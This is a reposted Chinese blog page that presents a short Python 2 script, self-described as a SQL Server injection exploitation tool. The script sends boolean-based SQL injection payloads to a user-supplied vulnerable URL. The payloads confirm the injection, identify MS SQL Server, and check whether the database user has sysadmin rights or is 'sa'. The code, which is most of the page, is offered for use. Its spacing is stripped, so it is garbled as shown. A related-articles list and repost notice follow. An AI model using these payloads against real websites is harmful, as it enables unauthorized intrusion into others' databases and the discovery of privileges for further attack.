Python编写数据库SA用户检测方案
无聊的时候,用Python写的一个小程序,用有注入点的链接,检测当前数据库用户是否为sa,没什么技术含量。
#CodebyzhaoxiaobuEmail:little.bu@hotmail.com
#-*-coding:UTF-8-*- fromsysimportexit fromurllibimporturlopen fromstringimportjoin,strip fromreimportsearch defis_sqlable(): sql1="%20and%201=2"sql2="%20and%201=1"urlfile1=urlopen(url+sql1) urlfile2=urlopen(url+sql2) htmlcodes1=urlfile1.read() htmlcodes2=urlfile2.read() ifnotsearch(judge,htmlcodes1)andsearch(judge,htmlcodes2): print"[信息]恭喜!这个URL是有注入漏洞的!\n"print"[信息]现在判断数据库是否是SQLServer,请耐心等候....." is_SQLServer() else: print"[错误]你确定这个URL能用?换个别的试试吧!\n"defis_SQLServer(): sql="%20and%20exists%20(select%20*%20from%20sysobjects)"urlfile=urlopen(url+sql) htmlcodes=urlfile.read() ifnotsearch(judge,htmlcodes): print"[错误]数据库好像不是SQLServer的!\n"else: print"[信息]确认是SQLServer数据库!\n"print"[信息]开始检测当前数据库用户权限,请耐心等待......"is_sysadmin() defis_sysadmin(): sql="%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"urlfile=urlopen(url+sql) htmlcodes=urlfile.read() ifnotsearch(judge,htmlcodes): print"[错误]当前数据库用户不具有sysadmin权限!\n"else: print"[信息]当前数据库用户具有sysadmin权限!\n"print"[信息]检测当前用户是不是SA,请耐心等待......"is_sa() defis_sa(): sql="%20and%20'sa'=(select%20System_user)"; urlfile=urlopen(url+sql) htmlcodes=urlfile.read() ifnotsearch(judge,htmlcodes): print"[错误]当前数据库用户不是SA!\n"else: print"[信息]当前数据库用户是SA!\n" print"\n########################################################################\n" print"^o^SQLServer注入利用工具^o^" print"Email:little.bu@hotmail.com\n" print"========================================================================"; url=raw_input('[信息]请输入一个可能有注入漏洞的链接!\nURL:') ifurl=='': print"[错误]提供的URL必须具有'.asp?xxx='这样的格式" exit(1) judge=raw_input("[信息]请提供一个判断字符串.\n判断字符串:") ifjudge=='': print"[错误]判断字符串不能为空!" exit(1) is_sqlable()
相关阅读
- TFS2008SP1, 升级数据库从SQL2005SP3到SQL2008SP1
- 2000W条数据的Oralce数据库SQL查询优化经验
- zclesam创建SMD数据库的缘由
- 恢复丢失的SQLServer日志文件 避免导致数据库彻底毁坏
- SQL Server数据库优化的10多种方法
- 几种数据库类型说明及发展历史
- MySQL数据库怎么实现远程连接访问
- MS SQL Server 2008数据库怎么实现数据库同步备份?
- 10款免费的MySQL数据库图形化管理工具
- SQLite内存数据库
《Python编写数据库SA用户检测方案》由网友“戏中人”推荐。
转载请注明:http://www.modouwifi.com/jiaocheng/05201110B2021.html